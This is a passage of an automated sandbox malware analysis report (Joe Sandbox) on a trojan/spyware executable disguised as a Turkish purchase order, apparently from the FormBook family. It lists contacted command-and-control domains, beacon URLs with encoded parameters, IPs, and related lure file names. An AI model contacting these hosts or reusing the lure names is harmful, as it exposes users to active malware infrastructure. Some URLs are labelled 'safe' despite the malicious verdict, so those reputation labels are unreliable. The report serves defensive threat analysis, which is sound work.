            https://valerieomage.com/k2gj?lxRlvTSh=ymeZBmicwKRkvYz1pzK8dvNYDsR2PzT6E62YqhKlQApFxMMJHFlv70ADTYJNZ0%Avira URL Cloudsafe
            http://www.saalameh.com0%Avira URL Cloudsafe
            http://www.valerieomage.com/k2gj/?lxRlvTSh=ymeZBmicwKRkvYz1pzK8dvNYDsR2PzT6E62YqhKlQApFxMMJHFlv70ADTYJNZSHN5jgdkAWV5BpKxies/HoRpeaidodvJqxOnF4QVVaL9HaFaof4/PPNLQo=&kh=9PxLvhoHS40%Avira URL Cloudsafe
            http://www.katgstamps.com/el0d/0%Avira URL Cloudsafe
            http://www.monchosoft.com/735n/0%Avira URL Cloudsafe
            http://www.katgstamps.com/el0d/?lxRlvTSh=+Q7ZzK8QtvU36dLJnzucjS+TJ0IzvZmyWs7tRfA/z2Vlh6102r3Lp6tJH45cMzuZYwqpgOtAlm44C9LsA0ZyYXRYfzgEIkIQAxK9duS/lWCJ3udFt4tR1RA=&kh=9PxLvhoHS40%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            ybw73.top
            		38.47.232.233
            		truefalse
              		unknown
              www.hissmjkl.com
              		172.67.137.15
              		truefalse
                		unknown
                www.theweekendcreator.com
                		217.160.0.87
                		truefalse
                  		unknown
                  saalameh.com
                  		84.32.84.32
                  		truefalse
                    		unknown
                    www.kaps4kancer.org
                    		74.208.236.247
                    		truefalse
                      		unknown
                      katgstamps.com
                      		3.33.130.190
                      		truefalse
                        		unknown
                        kloeti.pc205kopl.com
                        		162.209.189.212
                        		truefalse
                          		unknown
                          www.monchosoft.com
                          		46.30.211.38
                          		truefalse
                            		unknown
                            www.devele.top
                            		162.0.213.72
                            		truefalse
                              		unknown
                              shops.myshopify.com
                              		23.227.38.74
                              		truefalse
                                		unknown
                                qdfake525pm.xyz
                                		38.150.29.6
                                		truetrue
                                  		unknown
                                  www.miningarea.fun
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.katgstamps.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.qdfake525pm.xyz
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.saalameh.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.ddi828media.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.com-kh.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.vivemasvivebien.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.ybw73.top
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.66hc7.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.valerieomage.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.hissmjkl.com/m0xz/?lxRlvTSh=mXjiODcdBBXx02CT+mommPNahBZnOONdEz0dJALDPbptcbrNH3E9vFlm0oQl87Jfr/zi8sA6LXl9HQJlpR4v66WH/OKR7mDYMhPXwYhk+M55Q9NgI1iegHg=&kh=9PxLvhoHS4false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.saalameh.com/hfb9/?lxRlvTSh=fwSRWDIDlEtpZKpO15TnR7rdvvbvUQOUwoPVjl38Pi8M+UCq29ZeNKRmFQz0yoK86tSBJtX0+7UQykNFUthSdrPfT9CD49CruGe2y7ZC/ovpvsGUE+526xA=&kh=9PxLvhoHS4false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.qdfake525pm.xyz/a24j/?lxRlvTSh=RsceReT900EWT/dwsr4j9O4BlXzkLceVZQ7aWeUSP6prvEVffZLEO15AIWxlHKHabVj2I55FGLI5L0C49uGheAnDVqmJ9AiU0eI6N3YkeR21zvyMSZqsHmQ=&kh=9PxLvhoHS4false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.monchosoft.com/735n/?lxRlvTSh=KJAlFkGNwGXoK9jXB03h4jJMHTy8Y0+g9t3JgJmyeOCBT/uylrmuLZmon7piRwxkAvV6Iq7XsIFI/+KtRdw7O50MagBKJtHJjM3XcudO1Duzw6d1NcP9VI8=&kh=9PxLvhoHS4false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.66hc7.com/ooz9/?lxRlvTSh=MlFGyqpiH0BFSJI/fef/dCG888BGWBIcHVtVHklmmXS6c3kDIZAL8aaEfl7Aaohh3sZenWVq3ThPiwkLLGk004Us/fWH1X98Emf9JC/rX1g9bPHIk5sfq80=&kh=9PxLvhoHS4false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.valerieomage.com/k2gj/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.saalameh.com/hfb9/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.devele.top/nm4d/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.66hc7.com/ooz9/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.kaps4kancer.org/tqvk/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.kaps4kancer.org/tqvk/?lxRlvTSh=sqV4H0HgKEmT+MSVPZvHtNNOCugFouPGcNtakGXEq4+Q8zlVn8x6bNcZA2Wcm7hNKJFeivErhIl2wMRsNIGAokWHBtGrsDvz+bZZo+cuUvU/JTN/Qn5+SZw=&kh=9PxLvhoHS4false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.theweekendcreator.com/4h78/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.theweekendcreator.com/4h78/?lxRlvTSh=bXG7bLU8VpdhFuw8OEWepvz+lmtIgfU4QefCRLOwt0xUHukcXkmHP9rgqbjL97YnLUFJGTOXt4l1DZESwR3Y2jPuWZfGScD+gHNftK8/3r/KPWW9Eddz3K4=&kh=9PxLvhoHS4false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.ybw73.top/0ag0/?lxRlvTSh=ijsxwTuQWQMrQrpunY58zmHtK7oEhmVQOqZdZNdH7TeXDSEes5ptIscTzSElyzixUNFuHL69iVpfwUSC4AMHMDnys0WZTFD5qHcVGhhYgxj+QsPKbvjZ0mA=&kh=9PxLvhoHS4false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.ybw73.top/0ag0/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.hissmjkl.com/m0xz/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.valerieomage.com/k2gj/?lxRlvTSh=ymeZBmicwKRkvYz1pzK8dvNYDsR2PzT6E62YqhKlQApFxMMJHFlv70ADTYJNZSHN5jgdkAWV5BpKxies/HoRpeaidodvJqxOnF4QVVaL9HaFaof4/PPNLQo=&kh=9PxLvhoHS4false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.katgstamps.com/el0d/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.monchosoft.com/735n/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.katgstamps.com/el0d/?lxRlvTSh=+Q7ZzK8QtvU36dLJnzucjS+TJ0IzvZmyWs7tRfA/z2Vlh6102r3Lp6tJH45cMzuZYwqpgOtAlm44C9LsA0ZyYXRYfzgEIkIQAxK9duS/lWCJ3udFt4tR1RA=&kh=9PxLvhoHS4false
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://duckduckgo.com/chrome_newtabfc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designersG03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://duckduckgo.com/ac/?q=fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers/?03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.founder.com.cn/cn/bThe03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers?03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.cssfc.exe, 00000009.00000002.4153435982.00000000040F0000.00000004.10000000.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152791515.00000000039E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.tiro.com03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://goge8opp.com:301fc.exe, 00000009.00000002.4153435982.0000000003DCC000.00000004.10000000.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152791515.00000000036BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.goodfont.co.kr03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.sajatypeworks.com03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.typography.netD03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.founder.com.cn/cn/cThe03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.galapagosdesign.com/staff/dennis.htm03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.galapagosdesign.com/DPlease03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fonts.com03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.sandoll.co.kr03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssfc.exe, 00000009.00000002.4153435982.00000000040F0000.00000004.10000000.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152791515.00000000039E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.urwpp.deDPlease03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.zhongyicts.com.cn03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1685588395.0000000002E8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.sakkal.com03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.apache.org/licenses/LICENSE-2.003.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icofc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.ecosia.org/newtab/fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.carterandcone.coml03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://ac.ecosia.org/autocomplete?q=fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers/cabarga.htmlN03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.founder.com.cn/cn03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers/frere-user.html03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.jsfc.exe, 00000009.00000002.4153435982.00000000040F0000.00000004.10000000.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152791515.00000000039E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://valerieomage.com/k2gj?lxRlvTSh=ymeZBmicwKRkvYz1pzK8dvNYDsR2PzT6E62YqhKlQApFxMMJHFlv70ADTYJNZfc.exe, 00000009.00000002.4153435982.0000000004282000.00000004.10000000.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152791515.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.jiyu-kobo.co.jp/03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.saalameh.comakwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4154513255.000000000516F000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers803.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      38.150.29.6
                                                      		qdfake525pm.xyzUnited States
                                                      		174COGENT-174UStrue
                                                      162.0.213.72
                                                      		www.devele.topCanada
                                                      		35893ACPCAfalse
                                                      162.209.189.212
                                                      		kloeti.pc205kopl.comUnited States
                                                      		40065CNSERVERSUSfalse
                                                      172.67.137.15
                                                      		www.hissmjkl.comUnited States
                                                      		13335CLOUDFLARENETUSfalse
                                                      23.227.38.74
                                                      		shops.myshopify.comCanada
                                                      		13335CLOUDFLARENETUSfalse
                                                      84.32.84.32
                                                      		saalameh.comLithuania
                                                      		33922NTT-LT-ASLTfalse
                                                      217.160.0.87
                                                      		www.theweekendcreator.comGermany
                                                      		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                      38.47.232.233
                                                      		ybw73.topUnited States
                                                      		174COGENT-174USfalse
                                                      46.30.211.38
                                                      		www.monchosoft.comDenmark
                                                      		51468ONECOMDKfalse
                                                      74.208.236.247
                                                      		www.kaps4kancer.orgUnited States
                                                      		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                      3.33.130.190
                                                      		katgstamps.comUnited States
                                                      		8987AMAZONEXPANSIONGBfalse

                                                      General Information

                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                      Analysis ID:1467071
                                                      Start date and time:2024-07-03 17:42:17 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 11m 19s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:12
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:2
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:03.07.2024-sipari UG01072410 - Onka ve Tic a.s .exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@10/7@15/11
                                                      EGA Information:
                                                      • Successful, ratio: 75%
                                                      HCA Information:
                                                      • Successful, ratio: 90%
                                                      • Number of executed functions: 179
                                                      • Number of non-executed functions: 294
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      11:43:08API Interceptor1x Sleep call for process: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe modified
                                                      11:43:09API Interceptor16x Sleep call for process: powershell.exe modified
                                                      11:44:31API Interceptor8821699x Sleep call for process: fc.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      38.150.29.6PO Number 00127011.exeGet hashmaliciousFormBookBrowse
                                                      • www.qdfake525pm.xyz/yifw/
                                                      Halk #U0130#U015eLEM _24000000120887000033208 'd#U0131r.-1034 nolu TICARI .exeGet hashmaliciousFormBookBrowse
                                                      • www.qdfake525pm.xyz/a24j/?0N=RsceReT900EWT/dwsr4j9O4BlXzkLceVZQ7aWeUSP6prvEVffZLEO15AIWxlHKHabVj2I55FGLI5L0C49uGheAnDVqmJ9AiU0eI6N3YkeR21zvyMSZqsHmQ=&3x=xxOtBHK
                                                      QUOTATION #U2013 RFQ 000535.exeGet hashmaliciousFormBookBrowse
                                                      • www.qdfake525pm.xyz/yifw/
                                                      COTA#U00c7#U00c3O #U2013 RFQ 000535.exeGet hashmaliciousFormBookBrowse
                                                      • www.qdfake525pm.xyz/yifw/
                                                      ftrrrttyt.exeGet hashmaliciousFormBookBrowse
                                                      • www.qdfake525pm.xyz/yifw/
                                                      RFQ2024563429876-9887877654.exeGet hashmaliciousFormBookBrowse
                                                      • www.qdfake525pm.xyz/yifw/
                                                      162.0.213.729098393827383039.exeGet hashmaliciousFormBookBrowse
                                                      • www.hawalaz.xyz/ercr/
                                                      HSBCscancopy-invoice778483-payment87476MT103.exeGet hashmaliciousFormBookBrowse
                                                      • www.hawalaz.xyz/f0fa/
                                                      Adjunto confirmacion de pedido.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                      • www.hawalaz.xyz/ercr/
                                                      nJ8mJTmMf0.exeGet hashmaliciousFormBookBrowse
                                                      • www.adoby.xyz/ghq5/
                                                      DHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                      • www.adoby.xyz/ghq5/
                                                      Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                                      • www.devele.top/nm4d/
                                                      Potvrda narudzbe u prilogu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                      • www.hawalaz.xyz/ercr/
                                                      Shipping Documents.exeGet hashmaliciousFormBookBrowse
                                                      • www.beescy.xyz/pdwc/
                                                      Shipping Documents.exeGet hashmaliciousFormBookBrowse
                                                      • www.beescy.xyz/pdwc/
                                                      Salary Raise.exeGet hashmaliciousFormBookBrowse
                                                      • www.adoby.xyz/ghq5/

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      www.hissmjkl.comFiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                                      • 104.21.26.154
                                                      Halk #U0130#U015eLEM _24000000120887000033208 'd#U0131r.-1034 nolu TICARI .exeGet hashmaliciousFormBookBrowse
                                                      • 172.67.137.15
                                                      2_PT Adika Tirta Daya_PTID GTC of Purchase order(V2-092 .exeGet hashmaliciousFormBookBrowse
                                                      • 172.67.137.15
                                                      www.kaps4kancer.orgFiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                                      • 74.208.236.247
                                                      2_PT Adika Tirta Daya_PTID GTC of Purchase order(V2-092 .exeGet hashmaliciousFormBookBrowse
                                                      • 74.208.236.247
                                                      kloeti.pc205kopl.comHSBCscancopy-invoice778483-payment87476MT103.exeGet hashmaliciousFormBookBrowse
                                                      • 162.209.189.210
                                                      Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                                      • 162.209.189.210
                                                      KALIANDRA SETYATAMA_24000000120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                                      • 162.209.189.212
                                                      Halk #U0130#U015eLEM _24000000120887000033208 'd#U0131r.-1034 nolu TICARI .exeGet hashmaliciousFormBookBrowse
                                                      • 162.209.189.210
                                                      2_PT Adika Tirta Daya_PTID GTC of Purchase order(V2-092 .exeGet hashmaliciousFormBookBrowse
                                                      • 162.209.189.211
                                                      www.theweekendcreator.comFiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                                      • 217.160.0.87
                                                      PTvUbJWiNC.exeGet hashmaliciousFormBookBrowse
                                                      • 217.160.0.87
                                                      HSBC Customer Information.xlsGet hashmaliciousFormBookBrowse
                                                      • 217.160.0.87
                                                      gui.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 217.160.0.87
                                                      NEW RFQ PO1157.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 217.160.0.87
                                                      Halk #U0130#U015eLEM _24000000120887000033208 'd#U0131r.-1034 nolu TICARI .exeGet hashmaliciousFormBookBrowse
                                                      • 217.160.0.87
                                                      2_PT Adika Tirta Daya_PTID GTC of Purchase order(V2-092 .exeGet hashmaliciousFormBookBrowse
                                                      • 217.160.0.87
                                                      IGCC.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 217.160.0.87
                                                      rcPGDf7bW2.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 217.160.0.87
                                                      Invoices.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 217.160.0.87

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      COGENT-174USAWB NO. 077-57676135055.exeGet hashmaliciousFormBookBrowse
                                                      • 154.53.59.40
                                                      https://www.filemail.com/t/RuKZYfeBGet hashmaliciousHTMLPhisherBrowse
                                                      • 23.237.152.90
                                                      8bwKawHg0Z.exeGet hashmaliciousFormBookBrowse
                                                      • 38.6.177.47
                                                      7RsDGpyOQk.exeGet hashmaliciousFormBookBrowse
                                                      • 38.47.232.185
                                                      GA4vpVYBVP.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                      • 206.233.240.73
                                                      GaTxCRa6li.exeGet hashmaliciousGuLoaderBrowse
                                                      • 38.153.61.199
                                                      file.exeGet hashmaliciousFormBookBrowse
                                                      • 38.47.158.160
                                                      spc.elfGet hashmaliciousMiraiBrowse
                                                      • 38.162.204.50
                                                      watchdog.elfGet hashmaliciousMiraiBrowse
                                                      • 38.251.174.191
                                                      pKqvOdh3Sv.elfGet hashmaliciousMirai, MoobotBrowse
                                                      • 206.5.238.105
                                                      CNSERVERSUS9098393827383039.exeGet hashmaliciousFormBookBrowse
                                                      • 198.16.50.172
                                                      HSBCscancopy-invoice778483-payment87476MT103.exeGet hashmaliciousFormBookBrowse
                                                      • 198.16.50.172
                                                      Adjunto confirmacion de pedido.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                      • 198.16.50.172
                                                      Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                                      • 162.209.189.210
                                                      SJ5SyRpCFA.elfGet hashmaliciousUnknownBrowse
                                                      • 154.88.57.118
                                                      PO Number 00127011.exeGet hashmaliciousFormBookBrowse
                                                      • 198.16.50.172
                                                      arm4-20240623-0650.elfGet hashmaliciousMiraiBrowse
                                                      • 156.251.245.85
                                                      ORDEN DE COMPRA URGENTEsxlx..exeGet hashmaliciousFormBookBrowse
                                                      • 156.251.142.108
                                                      HSBC Bank_Approvel Letter.exeGet hashmaliciousFormBookBrowse
                                                      • 154.198.243.132
                                                      acLghFWq0Z.elfGet hashmaliciousMiraiBrowse
